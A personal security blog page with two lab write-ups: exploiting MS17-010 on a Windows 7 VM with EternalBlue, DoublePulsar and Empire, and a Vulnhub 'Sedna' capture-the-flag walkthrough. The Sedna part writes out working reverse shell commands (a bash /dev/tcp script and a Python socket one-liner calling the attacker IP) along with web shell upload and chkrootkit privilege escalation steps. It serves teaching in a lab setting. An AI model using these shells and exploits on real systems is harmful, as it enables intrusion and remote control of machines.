Wednesday, 24 May 2017

Exploiting Windows 7 Machine Using EternalBlue and DoublePulsar

Introduction

This the the demo I have created to understand how MS17-010 is exploited on windows 7 machine. This demo is based on the paper by Sheila A. Berta. I have created my lab environment with slightly different flavor of operating systems.

The tools I am going to use:

- Empire: Post exploitation powershell  agent [Kali Linux]
- Eternalblue: Exploit developed to exploit SMB v01 [Windows XP]
- Doublepulsar: A Plugin to inject malicious DLL to get a reverse shell [Windows XP]
- Fuzzbunch: Framework similar to metasploit coded in python 2.6[Windows XP]

Lab Setup

Attacker 1: Kali Linux with Empire tools [192.168.213.149]
Attacker 2: Window XP Service Pack 3 with Python 2.6 and PyWin32 v2.12[192.168.213.147]
Target Machine: A windows 7 box with Service Pack 1 [192.168.213.150]

Tools

Attacker machine 1: Kali Linux to be installed with Empire, that can be cloned from github.
Attacker machine 2: Windows XP with FuzzBunch, this can also be cloned from github.  You would require couple of more tools that would be required to run FuzzBunch, Python 2.6 and Pywin32 v2.12.


Note: You will have to change environmental variables to add Python 2.6 to the path. How to do this? Here you go
Target machine: Nothing :)

Code

There are couple of changes to be made to the actual exploit fb.py. comment out line 72, because the folder in empty inside the leak and returned errors until we comment the line out. 

Another change that need to make is on "Fuzzbunch.xml" file. we have to ammend the path on line 19 and 24 with the path on my XP machine:

C:\Documents and Settings\Administrator\Desktop\shadowbroker-master\shadowbroker
-master\windowsResources 


C:\Documents and Settings\Administrator\Desktop\shadowbroker-master\shadowbroker
-master\windows\logs

Exploitation

EternalBlue


Once everything is set and ready to go, we will fire-up the fb.py on  Windows XP  machine using python26.












































Fill the required details, target IP and callback IP (Kali machine). And used "0" for my already made project "eternal-test"























Now, we chose the exploit "EternalBlue".


















We will leave most of the settings to default in the exploit, but select "1" for Target OS to select windows 7 exploit and "1" for Mode of delivery to use "FB".












































Once all set, we will execute the exploit. The successful execution of the exploit will be confirmed by "Eternalblue Succeeded"























The Empire of Powershell


Once Eternalblue successfully ran, we will switch back to the Kali box and use "empire", to create a malicious DLL and setup a listening agent. 


















First step is to set up a listener so that a reverse connection can be established once malicious DLL is injected using Doublepulsar.  We will use HTTP listener  with a name "Eternal" (how thoughtful) and put  Kali's IP address under Host. Once all parameters were set, we will start the listener.












Once the listener is started, we will create a malicious DLL using Empire's module "Stager". we will set the architecture x86 as our target machine is 32-bit machine. We will execute the stager and a malicious DLL will be created with name "launcher.dll".

























Now, we will start our HTTP server on Kali and download the file to our attacker 1 machine, i.e. windows xp.




























The Doublepulsar

Now, it was time to inject our malicious DLL. Back to FuzzBunch, we will use Doublepulsar. 














Similar to eternalblue, we will be using the default settings, but ensure  the followings are set accordingly:

Protocol: "0" for SMB
Architecture: "0" for x86 (remember, we are using 32-bit OS)
Function: "2" to execute DLL
DllPayload: Path where "launcher.dll" is installed on the attacker machine.























And some more default settings we do not change.
























Final check on the module settings and hit execute.
























We know that the module ran successfully as we could see "Doublepulsar Succeeded". At this point, we should have a connection back on to my Kali box.















And... we have the reverse shell. To interact with the newly compromised machine, we just nee to  type "interact W74MEG9".



















Migrating to Meterpreter


Now that we have pwned the box. We will now be migrating our session to meterpreter. We will use multi handler with the payload "windows/meterpreter/reverse/http". 











On empire, we will use the module "powershell/code_execution/invoke_shellcode" and set the agent to "W74MEG9".









Once executed, we will check whether we have got a reverse meterpreter shell. 











There we go! This exploit is as easier to exploit as SMB Netapi attack on windows XP and 2003. 

Tuesday, 23 May 2017

Vulnhub - hackfest2016:Sedna Walkthrough

Enumeration:


To begin with, I ran nmap to identify the services running on the box.

Now we have some more information to start with and first target will be HTTP Services (80 and 8080). Our best friend Nikto gave us some vital information:

And HTTP service running on port 8080:

We have some more vital information, lets concentrate on port 80 first and then we will come back to 8080 later. We have identified that Apache 2.4.7 is running on the box and we can see "license.txt" file and it reveals that BuilderEngine is running. However, we still don't know what version it is running, lets enumerate bit more.

Nice! Few more directories, and this time the file "description.txt" revealed that BuilderEngine Version 3 is installed.




'

Going for the kill - Flag 1

To get the limited shell, we will be exploiting the BuilderEngine Arbitrary File Upload vulnerability to upload a shell. Exploit and PoC can be found here.
To upload a php shell (ensure you change IP and Port in the web shell so the shell comes back to you, I used port 443) we will use the POST method as explained in the exploit. 
Firing up firefox and launching the page will present us with the form to upload files, here we will upload our shell. 
Once we have uploaded the shell, we can find our shell in http://<targe ip>/files/.


We will start our netcat listener on port 443 and click the "php-reverse-shell.php" to execute our webshell. 

Bingo! we have the shell, to get the firs flag we will cd into "/var/www" to get the flag. 

Rooting the box - Flag 2

After exhausting the list of kernel exploits on searchsploit for Ubuntu 14.04 and kernel 13.3.0-32, I decided to do more enumerations I found out chkrootkit is installed on the machine. To our luck version 0.49 is installed. 


Searching on searchsploit we have found an exploit for chkrootkit version 0.49. As per the vulnerability  chkrootkit will execute all the files with root privileges. We will now create a bash script for reverse shell and wget into "tmp" folder:

#! /bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1

Once the script is ready, we will wget the script into the "tmp" directory and make it executable. 



Now we will start the listener on port 445 on our attacker machine and wait for the file to execute and send the reverse shell. 

w00t w00t! we have a root shell. However, there is a little bit of a problem. The shell we have got have some tty issue. To tackle with this, I will start another listener on port 8000 and use python one-liner reverse shell. 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.213.149",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'











There we go! we have a stable root shell and 2nd flag. 

Post exploitation - Flag 3

For flag 3, I did bit more enumerations, and as per nmap results I know that tomcat is running on port 8080. So further enumeration revealed tomcat manager's username and password is stored in file "tomcat-users.xml" in directory "/etc/tomcat7", which is in actual the 3rd flag.


I have enumerated to identify the 4th flag, to get the 4th flag I needed to crack a user's password. I have tried John as well as tried using bruteforce the user using ssh, but no luck. I'd be interested to see if someone actually cracked the password.  

Exploiting Windows 7 Machine Using EternalBlue and DoublePulsar

Introduction This the the demo I have created to understand how MS17-010 is exploited on windows 7 machine. This demo is based on the pa...